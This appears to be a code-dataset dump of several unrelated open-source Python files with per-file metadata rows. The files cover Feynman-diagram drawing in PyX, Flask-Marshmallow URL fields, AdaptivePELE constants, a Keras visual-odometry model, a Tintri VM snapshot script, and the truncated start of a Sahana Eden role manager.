0 if x is not None: self.x = x if y is not None: self.y = y if pos is not None: self.x, self.y = pos.getXY() self.direction = direction self.length = length self.size = size self.angle = angle self.constriction = constriction def draw(self, canvas): """Draw this arrow on the supplied canvas.""" endx, endy = self.x - self.length * math.sin(self.direction * math.pi / 180.0), \ self.y - self.length * math.cos(self.direction * math.pi / 180.0) linepath = pyx.deco.decoratedpath(pyx.path.path(pyx.path.moveto(endx, endy), pyx.path.lineto(self.x, self.y))) styles = [pyx.deco.earrow(size=self.size, angle=self.angle, constriction=self.constriction)] canvas.stroke(linepath.path, styles) class ParallelArrow(Visible): """Arrow running parallel to a line, for momenta, helicities etc.""" def __init__(self, line, pos=0.5, displace=0.3, length=0.5 * pyx.unit.v_cm, size=6 * pyx.unit.v_pt, angle=45, constriction=0.8, sense=1, curved=False, stems=1, stemsep=0.03): self.line = line self.pos = pos self.displace = pyx.unit.length(displace) self.length = length self.size = size self.angle = angle self.constriction = constriction self.sense = sense self.curved = curved self.stems = stems self.stemsep = stemsep def draw(self, canvas): """Draw this arrow on the supplied canvas.""" p = self.line.getPath() posparam = p.begin() + self.pos * p.arclen() x, y = self.line.fracpoint(self.pos).getXY() arrx, arry = self.line.fracpoint(self.pos + self.length / 2.0 / p.arclen()).getXY() endx, endy = self.line.fracpoint(self.pos - self.length / 2.0 / p.arclen()).getXY() # Calculate the displacement from the line displacement = self.displace intrinsicwidth = pyx.unit.length(0.1) if hasattr(self.line, "arcradius"): intrinsicwidth = self.line.arcradius if displacement > 0: displacement += intrinsicwidth else: displacement -= intrinsicwidth if config.DEBUG: print "Displacement = ", displacement # Position the arrow on the right hand side of lines tangent = p.tangent(posparam, displacement) normal = tangent.transformed(pyx.trafo.rotate(90, x, y)) nx, ny = normal.atend() nxcm, nycm = pyx.unit.tocm(nx - x), pyx.unit.tocm(ny - y) vx, vy = p.atbegin() vxcm, vycm = pyx.unit.tocm(x - vx), pyx.unit.tocm(y - vy) # If the arrow is on the left, flip it by 180 degrees if (vxcm * nycm - vycm * nxcm) > 0: normal = normal.transformed(pyx.trafo.rotate(180, x, y)) nx, ny = normal.atend() if displacement < 0: normal = normal.transformed(pyx.trafo.rotate(180, x, y)) nx, ny = normal.atend() # Displace the arrow by this normal vector endx, endy = endx + (nx - x), endy + (ny - y) arrx, arry = arrx + (nx - x), arry + (ny - y) if self.sense < 0: arrx, arry, endx, endy = endx, endy, arrx, arry if not self.curved: linepath = pyx.path.path(pyx.path.moveto(endx, endy), pyx.path.lineto(arrx, arry)) styles = [pyx.deco.earrow(size=self.size, angle=self.angle, constriction=self.constriction)] dist = self.stemsep n = self.stems if n > 1: # helicity style arrow arrowtopath = linepath.split(0.8 * linepath.arclen())[0] constrictionlen = self.size * self.constriction * \ math.cos(self.angle * math.pi / 360.0) arrowpath = pyx.deco._arrowhead(arrowtopath, linepath.arclen(), 1, self.size, 45, True, constrictionlen) canvas.fill(arrowpath) path = pyx.deformer.parallel(-(n + 1) / 2 * dist).deform(arrowtopath) defo = pyx.deformer.parallel(dist) for m in range(n): path = defo.deform(path) canvas.stroke(path, []) else: # ordinary (momentum) arrow canvas.stroke(linepath, styles) else: # curved arrow (always momentum-style) curvepiece = self.line.getPath().split([(self.pos*p.arclen()-self.length/2.0), (self.pos*p.arclen()+self.length/2.0)]) arrpiece = curvepiece[1] if self.sense < 0: arrpiece = arrpiece.reversed() linepath = pyx.deco.decoratedpath(pyx.deformer.parallel(displacement).deform(arrpiece)) styles = [pyx.deco.earrow(size=self.size, angle=self.angle, constriction=self.constriction)] canvas.stroke(linepath.path, styles) class Label(Visible): """General label, unattached to any diagram elements""" def __init__(self, text, pos=None, x=None, y=None, size=pyx.text.size.normalsize): self.x, self.y = 0, 0 if x is not None: self.x = x if y is not None: self.y = y self.size = size self.text = text self.textattrs = [] self.pos = pos def draw(self, canvas): """Draw this label on the supplied canvas.""" textattrs = pyx.attr.mergeattrs([pyx.text.halign.center, pyx.text.vshift.mathaxis, self.size] + self.textattrs) t = pyx.text.defaulttexrunner.text(self.x, self.y, self.text, textattrs) canvas.insert(t) class PointLabel(Label): """Label attached to points on the diagram""" def __init__(self, point, text, displace=0.3, angle=0, size=pyx.text.size.normalsize): self.size = size self.displace = pyx.unit.length(displace) self.angle = angle self.text = text self.point = point self.textattrs = [] def getPoint(self): """Get the point associated with this label.""" return self.point def setPoint(self, point): """Set the point associated with this label.""" self.point = point return self def draw(self, canvas): """Draw this label on the supplied canvas.""" x = self.point.getX() + self.displace * math.cos(math.radians(self.angle)) y = self.point.getY() + self.displace * math.sin(math.radians(self.angle)) textattrs = pyx.attr.mergeattrs([pyx.text.halign.center, pyx.text.vshift.mathaxis, self.size] + self.textattrs) t = pyx.text.defaulttexrunner.text(x, y, self.text, textattrs) canvas.insert(t) class LineLabel(Label): """Label for Feynman diagram lines""" def __init__(self, line, text, pos=0.5, displace=0.3, angle=0, size=pyx.text.size.normalsize): self.pos = pos self.size = size self.displace = pyx.unit.length(displace) self.angle = angle self.text = text self.line = line self.textattrs = [] def getLine(self): """Get the associated line.""" return self.line def setLine(self, line): """Set the associated line.""" self.line = line return self def draw(self, canvas): """Draw this label on the supplied canvas.""" p = self.line.getPath() #x, y = self.line.fracPoint(self.pos).getXY() posparam = p.begin() + self.pos * p.arclen() x, y = p.at(posparam) # Calculate the displacement from the line displacement = self.displace intrinsicwidth = pyx.unit.length(0.1) if hasattr(self.line, "arcradius"): intrinsicwidth = self.line.arcradius if displacement > 0: displacement += intrinsicwidth else: displacement -= intrinsicwidth if config.DEBUG: print "Displacement = ", displacement # Position the label on the right hand side of lines tangent = p.tangent(posparam, displacement) normal = tangent.transformed(pyx.trafo.rotate(90, x, y)) nx, ny = normal.atend() nxcm, nycm = pyx.unit.tocm(nx - x), pyx.unit.tocm(ny - y) vx, vy = p.atbegin() vxcm, vycm = pyx.unit.tocm(x - vx), pyx.unit.tocm(y - vy) # If the label is on the left, flip it by 180 degrees if (vxcm * nycm - vycm * nxcm) > 0: normal = normal.transformed(pyx.trafo.rotate(180, x, y)) nx, ny = normal.atend() if displacement < 0: normal = normal.transformed(pyx.trafo.rotate(180, x, y)) nx, ny = normal.atend() # Displace the label by this normal vector x, y = nx, ny textattrs = pyx.attr.mergeattrs([pyx.text.halign.center, pyx.text.vshift.mathaxis, self.size] + self.textattrs) t = pyx.text.defaulttexrunner.text(x, y, self.text, textattrs) #t.linealign(self.displace, # math.cos(self.angle * math.pi/180), # math.sin(self.angle * math.pi/180)) canvas.insert(t) __all__ = ["Arrow", "FreeArrow", "ParallelArrow", "Label", "PointLabel", "LineLabel"]
gpl-2.0
4,276,754,985,112,377,000
38.661184
99
0.565066
false
3.576683
false
false
false
tranthibaokhanh/thoughtloungev2
lib/flask_marshmallow_local/fields.py
1
4727
# -*- coding: utf-8 -*- """ flask_marshmallow.fields ~~~~~~~~~~~~~~~~~~~~~~~~ Custom, Flask-specific fields. See the following link for a list of all available fields from the marshmallow library. See http://marshmallow.readthedocs.org/en/latest/api_reference.html#module-marshmallow.fields """ import re import sys from marshmallow import fields, utils from marshmallow.exceptions import ForcedError from flask import url_for from werkzeug.routing import BuildError # Py2/3 compatibility PY2 = sys.version_info[0] == 2 if not PY2: iteritems = lambda d: iter(d.items()) else: iteritems = lambda d: d.iteritems() _tpl_pattern = re.compile(r'\s*<\s*(\S*)\s*>\s*') __all__ = [ 'URLFor', 'UrlFor', 'AbsoluteURLFor', 'AbsoluteUrlFor', 'Hyperlinks', ] def _tpl(val): """Return value within ``< >`` if possible, else return ``None``.""" match = _tpl_pattern.match(val) if match: return match.groups()[0] return None class URLFor(fields.Field): """Field that outputs the URL for an endpoint. Acts identically to Flask's ``url_for`` function, except that arguments can be pulled from the object to be serialized. Usage: :: url = URLFor('author_get', id='<id>') https_url = URLFor('author_get', id='<id>', _scheme='https', _external=True) :param str endpoint: Flask endpoint name. :param kwargs: Same keyword arguments as Flask's url_for, except string arguments enclosed in `< >` will be interpreted as attributes to pull from the object. """ _CHECK_ATTRIBUTE = False def __init__(self, endpoint, **kwargs): self.endpoint = endpoint self.params = kwargs fields.Field.__init__(self, **kwargs) def _format(self, val): return val def _serialize(self, value, key, obj): """Output the URL for the endpoint, given the kwargs passed to ``__init__``. """ param_values = {} for name, attr_tpl in iteritems(self.params): attr_name = _tpl(str(attr_tpl)) if attr_name: attribute_value = utils.get_value(attr_name, obj, default=fields.missing) if attribute_value is not fields.missing: param_values[name] = attribute_value else: raise ForcedError(AttributeError( '{attr_name!r} is not a valid ' 'attribute of {obj!r}'.format( attr_name=attr_name, obj=obj, ))) else: param_values[name] = attr_tpl try: return url_for(self.endpoint, **param_values) except BuildError as err: # Make sure BuildErrors are raised raise ForcedError(err) UrlFor = URLFor class AbsoluteURLFor(URLFor): """Field that outputs the absolute URL for an endpoint.""" def __init__(self, endpoint, **kwargs): kwargs['_external'] = True URLFor.__init__(self, endpoint=endpoint, **kwargs) def _format(self, val): return val AbsoluteUrlFor = AbsoluteURLFor def _rapply(d, func, *args, **kwargs): """Apply a function to all values in a dictionary, recursively.""" if isinstance(d, dict): return { key: _rapply(value, func, *args, **kwargs) for key, value in iteritems(d) } else: return func(d, *args, **kwargs) def _url_val(val, key, obj, **kwargs): """Function applied by `HyperlinksField` to get the correct value in the schema. """ if isinstance(val, URLFor): return val.serialize(key, obj, **kwargs) else: return val class Hyperlinks(fields.Field): """Field that outputs a dictionary of hyperlinks, given a dictionary schema with :class:`URL <flask_marshmallow.fields.URL>` objects as values. Example: :: _links = Hyperlinks({ 'self': URL('author', id='<id>'), 'collection': URL('author_list'), } }) `URL` objects can be nested within the dictionary. :: _links = Hyperlinks({ 'self': { 'href': URL('book', id='<id>'), 'title': 'book detail' } }) :param dict schema: A dict that maps names to :class:`URL <flask_marshmallow.fields.URL>` endpoints. """ _CHECK_ATTRIBUTE = False def __init__(self, schema, **kwargs): self.schema = schema fields.Field.__init__(self, **kwargs) def _format(self, val): return val def _serialize(self, value, attr, obj): return _rapply(self.schema, _url_val, key=attr, obj=obj)
mit
1,358,582,022,125,161,700
27.475904
97
0.57986
false
3.919569
false
false
false
AdaptivePELE/AdaptivePELE
AdaptivePELE/constants/constants.py
1
7191
from __future__ import absolute_import, division, print_function, unicode_literals import os import socket machine = socket.getfqdn() print("MACHINE", machine) if "bsccv" in machine: PELE_EXECUTABLE = "/data/EAPM/PELE/PELE++/bin/rev12360/Pele_rev12360_mpi" DATA_FOLDER = "/data/EAPM/PELE/PELE++/data/rev12360/Data" DOCUMENTS_FOLDER = "/data/EAPM/PELE/PELE++/Documents/rev12360" PYTHON = "/data2/apps/PYTHON/2.7.5/bin/python2.7" elif "mn.bsc" in machine: PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/nord/V1.6/build/PELE-1.6_mpi" DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/V1.6/Data" DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/V1.6/Documents" PYTHON = "python" elif "bsc.mn" in machine: PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/build/PELE-1.6_mpi" DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/Data" DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/Documents" elif "bullx" in machine: # this values are not correct for the minoTauro hardware, just leaving it # here as a placeholder PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/nord/rev090518/bin/PELE-1.5_mpi" DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/rev090518/Data" DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/rev090518/Documents" elif machine == "bscls309": PELE_EXECUTABLE = "/home/jgilaber/PELE-repo/bin/PELE-1.6_mpi" DATA_FOLDER = "/home/jgilaber/PELE-repo/Data" DOCUMENTS_FOLDER = "/home/jgilaber/PELE-repo/Documents" else: PELE_EXECUTABLE = None DATA_FOLDER = None DOCUMENTS_FOLDER = None inputFileTemplate = "{ \"files\" : [ { \"path\" : \"%s\" } ] }" trajectoryBasename = "*traj*" class AmberTemplates: forcefields = {"ff99SB": "oldff/leaprc.ff99SB", "ff14SB": "leaprc.protein.ff14SB"} antechamberTemplate = "antechamber -i $LIGAND -fi pdb -o $OUTPUT -fo mol2 -c bcc -pf y -nc $CHARGE" parmchk2Template = "parmchk2 -i $MOL2 -f mol2 -o $OUTPUT" tleapTemplate = "source $FORCEFIELD\n" \ "source leaprc.gaff\n" \ "source leaprc.water.tip3p\n" \ "$MODIFIED_RES " \ "$LIGANDS " \ "$DUM " \ "$COFACTORS " \ "COMPLX = loadpdb $COMPLEX\n" \ "$BONDS " \ "addions COMPLX Cl- 0\n" \ "addions COMPLX Na+ 0\n" \ "solvatebox COMPLX TIP3PBOX $BOXSIZE\n" \ "saveamberparm COMPLX $PRMTOP $INPCRD\n" \ "savepdb COMPLX $SOLVATED_PDB\n" \ "quit" DUM_atom = "DUM" DUM_res = "DUM" DUM_prep = " 0 0 0\n" \ "\n" \ "------%s--------------\n" \ "%s\n" \ "%s INT 0\n" \ "CHANGE OMIT DU BEG\n" \ " 0.0\n" \ " 1 DUMM DU M 0 -1 -2 0.000 0.000 0.000 0.000\n" \ " 2 DUMM DU M 1 0 -1 1.0000 0.0000 0.0000 0.000\n" \ " 3 DUMM DU M 2 1 0 1.0000 90.0000 0.0000 0.000\n" \ " 4 %s C E 0.00 0.00 0.00 0.00\n" \ "\n" \ "\n" \ "DONE\n" \ "STOP\n" \ "\n" % (DUM_res, DUM_res, DUM_res, DUM_atom) DUM_cyl_prep = " 0 0 0\n" \ "\n" \ "------%s--------------\n" \ "%s\n" \ "%s INT 0\n" \ "CHANGE OMIT DU BEG\n" \ " 0.0\n" \ " 1 DUMM DU M 0 -1 -2 0.000 0.000 0.000 0.000\n" \ " 2 DUMM DU M 1 0 -1 1.0000 0.0000 0.0000 0.000\n" \ " 3 DUMM DU M 2 1 0 1.0000 90.0000 0.0000 0.000\n" \ " 4 %s C E 0.00 0.00 0.00 0.00\n" \ " 5 %s C E 0.00 0.00 0.00 0.00\n" \ " 6 %s C E 0.00 0.00 0.00 0.00\n" \ "\n" \ "\n" \ "DONE\n" \ "STOP\n" \ "\n" % (DUM_res, DUM_res, DUM_res, DUM_atom, DUM_atom+"B", DUM_atom+"T") DUM_frcmod = "invented MM atom\n" \ "MASS\n" \ "%s 0.00 0.00\n" \ "\n" \ "NONB\n" \ " %s 0.00 0.00\n" % (DUM_atom, DUM_atom) DUM_cyl_frcmod = "invented MM atom\n" \ "MASS\n" \ "%s 0.00 0.00\n" \ "%s 0.00 0.00\n" \ "%s 0.00 0.00\n" \ "\n" \ "NONB\n" \ " %s 0.00 0.00\n" \ " %s 0.00 0.00\n" \ " %s 0.00 0.00\n" % (DUM_atom, DUM_atom+"B", DUM_atom+"T", DUM_atom, DUM_atom+"B", DUM_atom+"T") trajectoryTemplate = "trajectory_%d.%s" CheckPointReporterTemplate = "checkpoint_%d.chk" class OutputPathConstants(): """ Class with constants that depend on the outputPath """ def __init__(self, outputPath): self.originalControlFile = "" self.epochOutputPathTempletized = "" self.clusteringOutputDir = "" self.clusteringOutputObject = "" self.equilibrationDir = "" self.tmpInitialStructuresTemplate = "" self.tmpControlFilename = "" self.tmpInitialStructuresEquilibrationTemplate = "" self.tmpControlFilenameEqulibration = "" self.topologies = "" self.allTrajsPath = "" self.MSMObjectEpoch = "" self.buildConstants(outputPath) def buildConstants(self, outputPath): self.buildOutputPathConstants(outputPath) self.tmpFolder = "tmp_" + outputPath.replace("/", "_") self.buildTmpFolderConstants(self.tmpFolder) def buildOutputPathConstants(self, outputPath): self.originalControlFile = os.path.join(outputPath, "originalControlFile.conf") self.epochOutputPathTempletized = os.path.join(outputPath, "%d") self.clusteringOutputDir = os.path.join(self.epochOutputPathTempletized, "clustering") self.clusteringOutputObject = os.path.join(self.clusteringOutputDir, "object.pkl") self.MSMObjectEpoch = os.path.join(self.epochOutputPathTempletized, "MSM_object.pkl") self.topologies = os.path.join(outputPath, "topologies") self.equilibrationDir = os.path.join(outputPath, "equilibration") self.allTrajsPath = os.path.join(outputPath, "allTrajs") def buildTmpFolderConstants(self, tmpFolder): self.tmpInitialStructuresTemplate = tmpFolder+"/initial_%d_%d.pdb" self.tmpInitialStructuresEquilibrationTemplate = tmpFolder+"/initial_equilibration_%d.pdb" self.tmpControlFilename = tmpFolder+"/controlFile%d.conf" self.tmpControlFilenameEqulibration = tmpFolder+"/controlFile_equilibration_%d.conf" md_supported_formats = set(["xtc", "dcd"]) formats_md_string = ", ".join(md_supported_formats)
mit
-6,549,988,297,967,724,000
42.05988
129
0.522459
false
2.998749
false
false
false
ksu-mechatronics-research/deep-visual-odometry
models/hand_crafted/alexnet_inspired/alexNet_14q/alexnet14.py
1
2703
# The Model of DeepVO from keras.layers import Input from keras.layers.core import Dense, Dropout, Activation, Flatten, Lambda from keras.layers.convolutional import Convolution2D, MaxPooling2D from keras.layers.normalization import BatchNormalization from keras.models import Model from keras.layers.advanced_activations import PReLU from keras import backend as K #enable tensorflow functions #AlexNet with batch normalization in Keras #input image is 128x128 def create_model(): """ This model is designed to take in images and give multiple outputs. Here is what the network was designed for: Inputs: 128x128X6 RGB images stacked (RGBRGB) Outputs: Translation between two images Rotation between images in quaternion form """ input_img = Input(shape=(128, 128, 6), name='input_img') x = Convolution2D(96, 11, 11, border_mode='same')(input_img) x = BatchNormalization()(x) x = Activation('relu')(x) x = MaxPooling2D(pool_size=(11, 11), strides=(5, 5), border_mode='same')(x) x = Convolution2D(384, 3, 3, border_mode='same')(x) x = BatchNormalization()(x) x = Activation('relu')(x) x = MaxPooling2D(pool_size=(3, 3), strides=(3, 3), border_mode='same')(x) x = Flatten()(x) x = Dense(4096, init='normal')(x) x = BatchNormalization()(x) x = Activation('relu')(x) x = Dense(4096, init='normal')(x) x = BatchNormalization()(x) x = Activation('relu')(x) # Delta Translation output translation_proc = Dense(3, init='normal')(x) vector_translation = Activation(PReLU(), name='translation')(translation_proc) # Delta rotation in quaternion form rotation_proc = Dense(64, activation='relu')(x) rotation_proc = Dense(64, activation='relu')(rotation_proc) rotation_proc = Dense(64, activation='relu')(rotation_proc) rotation_proc = Dense(4, activation='tanh')(rotation_proc) quaternion_rotation = Lambda(normalize_quaternion, name='rotation')(rotation_proc) model = Model(input=input_img, output=[vector_translation, quaternion_rotation]) return model def normalize_quaternion(x): "Use tensorflow normalize function on this layer to ensure valid quaternion rotation" x = K.l2_normalize(x, axis=1) return x def train_model(model, Xtr, Ytr, Xte, Yte, save_path=None): "Note: y should be [[translation],[quat rotation]]" model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_absolute_error']) history = model.fit(Xtr, Ytr, validation_split=0.2, batch_size=8, nb_epoch=30, verbose=1) score = model.evaluate(Xte, Yte, verbose=1) if save_path: model.save(save_path) return score, history
mit
-4,285,629,334,953,081,000
32.37037
95
0.691454
false
3.580132
false
false
false
droodle/kansha
kansha/checklist/comp.py
1
5840
# -- # Copyright (c) 2012-2014 Net-ng. # All rights reserved. # # This software is licensed under the BSD License, as described in # the file LICENSE.txt, which you should have received as part of # this distribution. # -- from nagare import component, database, security import json from kansha.title import comp as title from kansha import notifications from models import DataChecklist, DataChecklistItem class NewChecklistItem(object): def __init__(self): self.focus = False class ChecklistTitle(title.Title): model = DataChecklist field_type = 'input' class ChecklistItemTitle(title.Title): model = DataChecklistItem field_type = 'input' class ChecklistItem(object): def __init__(self, id_, data=None): self.id = id_ data = data if data is not None else self.data self.title = component.Component(ChecklistItemTitle(self)) self.title.on_answer(lambda v: self.title.call(model='edit' if not self.title.model else None)) self.done = data.done @property def data(self): return DataChecklistItem.get(self.id) def get_title(self): return self.data.title def set_title(self, title): self.data.title = title def set_done(self): '''toggle done status''' self.data.done = self.done = not self.done item = self.data data = {'item': self.get_title(), 'list': item.checklist.title, 'card': item.checklist.card.title} notifications.add_history(item.checklist.card.column.board, item.checklist.card, security.get_user().data, u'card_listitem_done' if self.done else u'card_listitem_undone', data) class Checklist(object): def __init__(self, id_, data=None): self.id = id_ data = data if data is not None else self.data self.items = [component.Component(ChecklistItem(item.id, item)) for item in data.items] self.title = component.Component(ChecklistTitle(self)) self.title.on_answer(self.handle_answer) self.new_item = component.Component(NewChecklistItem()) self.new_item.on_answer(self.add_item) def handle_answer(self, v): if v and self.title.model: self.new_title(v) self.title.call(model='edit' if not self.title.model else None) def edit_title(self): self.title.becomes(model='edit') def reorder_items(self): for i, item in enumerate(self.data.items): item.index = i def add_item(self, text): if text is None or not text.strip(): return item = DataChecklistItem(checklist=self.data, title=text.strip(), index=len(self.data.items)) database.session.flush() item = component.Component(ChecklistItem(item.id, item)) self.items.append(item) self.reorder_items() self.new_item().focus = True def delete_item(self, index): item = self.items.pop(index)() item.data.delete() self.reorder_items() def get_title(self): return self.data.title def set_title(self, title): self.data.title = title def set_index(self, index): self.data.index = index @property def total_items(self): return len(self.items) @property def nb_items(self): return len([item for item in self.items if item().done]) @property def progress(self): if not self.items: return 0 return self.nb_items * 100 / self.total_items @property def data(self): return DataChecklist.get(self.id) def new_title(self, title): cl = self.data data = {'list': title, 'card': cl.card.title} notifications.add_history(cl.card.column.board, cl.card, security.get_user().data, u'card_add_list', data) class Checklists(object): def __init__(self, card): self.parent = card self.checklists = [component.Component(Checklist(clist.id, clist)) for clist in card.data.checklists] @property def nb_items(self): return sum([cl().nb_items for cl in self.checklists]) @property def total_items(self): return sum([cl().total_items for cl in self.checklists]) def delete_checklist(self, index): cl = self.checklists.pop(index)() for i in range(index, len(self.checklists)): self.checklists[i]().set_index(i) data = {'list': cl.get_title(), 'card': self.parent.get_title()} cl.data.delete() if data['list']: notifications.add_history(self.parent.column.board.data, self.parent.data, security.get_user().data, u'card_delete_list', data) def add_checklist(self): clist = DataChecklist(card=self.parent.data) database.session.flush() ck = Checklist(clist.id, clist) ck.edit_title() ck.set_index(len(self.checklists)) self.checklists.append(component.Component(ck)) def reorder(self, ids): """Reorder checklists In: - ``ids`` -- checklist ids """ new_order = [] i = 0 for cl_id in json.loads(ids): id_ = int(cl_id.split('_')[-1]) for cl in self.checklists: if cl().id == id_: cl().set_index(i) i += 1 new_order.append(cl) self.checklists = new_order
bsd-3-clause
-5,212,961,767,522,489,000
29.103093
109
0.568151
false
3.880399
false
false
false
Tintri/tintri-api-examples
snapshot_vm.py
1
5628
#!/usr/bin/python # -*- coding: utf-8 -*- # # The MIT License (MIT) # # Copyright (c) 2016 Tintri, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import sys import json import datetime import tintri_1_1 as tintri """ This Python script takes a snapshot for the specified VM. """ # For exhaustive messages on console, make it to True; otherwise keep it False debug_mode = False def print_with_prefix(prefix, out): print(prefix + out) return def print_debug(out): if debug_mode: print_with_prefix("[DEBUG] : ", out) return def print_info(out): print_with_prefix("[INFO] : ", out) return def print_error(out): print_with_prefix("[ERROR] : ", out) return # Take a manual snapshot. def take_snapshot(vm_uuid, snapshot_name, consistency_type, server_name, session_id): snapshot_spec = { 'typeId' : "com.tintri.api.rest.v310.dto.domain.beans.snapshot.SnapshotSpec", 'consistency' : consistency_type, 'retentionMinutes' : 240, # 4 hours 'snapshotName' : snapshot_name, 'sourceVmTintriUUID' : vm_uuid } # The API needs a list of snapshot specifications. snapshot_specs = [snapshot_spec] ss_url = "/v310/snapshot" r = tintri.api_post(server_name, ss_url, snapshot_specs, session_id) if (r.status_code != 200): msg = "The HTTP response for the post invoke to the server is " + \ server_name + "not 200, but is: " + str(r.status_code) + "." raise tintri.TintriApiException(msg, r.status_code, vm_url, str(snapshot_specs), r.text) print_debug("The JSON response of the post invoke to the server " + server_name + " is: " + r.text) # The result is a liset of snapshot UUIDs. snapshot_result = r.json() print_info(snapshot_name + ": " + snapshot_result[0]) return # main if len(sys.argv) < 5: print("\nSnapshot a VM.\n") print("Usage: " + sys.argv[0] + " server_name user_name password vm_name [consistency type]\n") print(" consistency type can be 'crash' or 'vm'. The default is 'crash'.") sys.exit(-1) server_name = sys.argv[1] user_name = sys.argv[2] password = sys.argv[3] vm_name = sys.argv[4] if (len(sys.argv) == 6): consistency_type = sys.argv[5] else: consistency_type = "crash" try: # Confirm the consistency type. if (consistency_type == "crash"): consistency_type = "CRASH_CONSISTENT" elif (consistency_type == "vm"): consistency_type = "VM_CONSISTENT" else: raise tintri.TintriRequestException("consistency_type is not 'crash' or 'vm': " + consistency_type) # Get the preferred version r = tintri.api_version(server_name) json_info = r.json() print_info("API Version: " + json_info['preferredVersion']) # Login to VMstore or TGC session_id = tintri.api_login(server_name, user_name, password) except tintri.TintriRequestsException as tre: print_error(tre.__str__()) sys.exit(-10) except tintri.TintriApiException as tae: print_error(tae.__str__()) sys.exit(-11) try: # Create query filter to get the VM specified by the VM name. q_filter = {'name': vm_name} # Get the UUID of the specified VM vm_url = "/v310/vm" r = tintri.api_get_query(server_name, vm_url, q_filter, session_id) print_debug("The JSON response of the get invoke to the server " + server_name + " is: " + r.text) vm_paginated_result = r.json() num_vms = int(vm_paginated_result["filteredTotal"]) if num_vms == 0: raise tintri.TintriRequestsException("VM " + vm_name + " doesn't exist") # Get the information from the first item and hopefully the only item. items = vm_paginated_result["items"] vm = items[0] vm_name = vm["vmware"]["name"] vm_uuid = vm["uuid"]["uuid"] print_info(vm_name + ": " + vm_uuid) # Get the time for the snapshot description. now = datetime.datetime.now() now_sec = datetime.datetime(now.year, now.month, now.day, now.hour, now.minute, now.second) snapshot_name = vm_name + now_sec.isoformat() # Take a manual snapshot. take_snapshot(vm_uuid, snapshot_name, consistency_type, server_name, session_id) # All pau, log out. tintri.api_logout(server_name, session_id) except tintri.TintriRequestsException as tre: print_error(tre.__str__()) tintri.api_logout(server_name, session_id) sys.exit(-20) except tintri.TintriApiException as tae: print_error(tae.__str__()) tintri.api_logout(server_name, session_id) sys.exit(-21)
mit
-2,311,016,554,236,844,000
31.344828
107
0.663468
false
3.450644
false
false
false
flavour/eden
modules/s3/s3roles.py
1
73907
# -*- coding: utf-8 -*- """ S3 User Roles Management @copyright: 2018-2019 (c) Sahana Software Foundation @license: MIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ __all__ = ("S3RoleManager", ) import uuid import json #import sys from gluon import current, URL, DIV, SPAN, SQLFORM, INPUT, A, LI, UL from s3compat import StringIO, long from s3dal import Field from .s3crud import S3CRUD from .s3rest import S3Method from .s3query import FS from .s3utils import s3_str, s3_mark_required from .s3validators import JSONERRORS from .s3widgets import s3_comments_widget from .s3xml import SEPARATORS # ============================================================================= class S3RoleManager(S3Method): """ REST Method to manage user roles and permission rules """ # ------------------------------------------------------------------------- def apply_method(self, r, **attr): """ Entry point for REST interface. @param r: the S3Request instance @param attr: controller attributes """ method = self.method tablename = self.tablename auth = current.auth sr = auth.get_system_roles() output = {} if tablename == "auth_group": # through admin/role controller # Only ADMIN can manipulate roles if not auth.s3_has_role(sr.ADMIN): r.unauthorised() if method == "list": output = self.role_list(r, **attr) elif method in ("read", "create", "update"): output = self.role_form(r, **attr) elif method == "copy": output = self.copy_role(r, **attr) elif method == "delete": output = self.delete_role(r, **attr) elif method == "users": output = self.assign_users(r, **attr) elif method == "import": output = self.import_roles(r, **attr) else: r.error(405, current.ERROR.BAD_METHOD) elif tablename == "auth_user": # through admin/user controller # Must have read-permission for the user record # (user accounts are filtered to OU by controller) if not self._permitted(): r.unauthorised() if method == "roles": output = self.assign_roles(r, **attr) else: r.error(405, current.ERROR.BAD_METHOD) # TODO implement per-target perspective #elif tablename == "s3_permission": # through admin/permissions controller # # # View permissions for a target (page or table) # r.error(501, current.ERROR.NOT_IMPLEMENTED) else: r.error(401, current.ERROR.BAD_REQUEST) return output # ------------------------------------------------------------------------- def role_list(self, r, **attr): """ List or export roles @param r: the S3Request instance @param attr: controller attributes NB this function must be restricted to ADMINs (in apply_method) """ # Check permission to read in this table authorised = self._permitted() if not authorised: 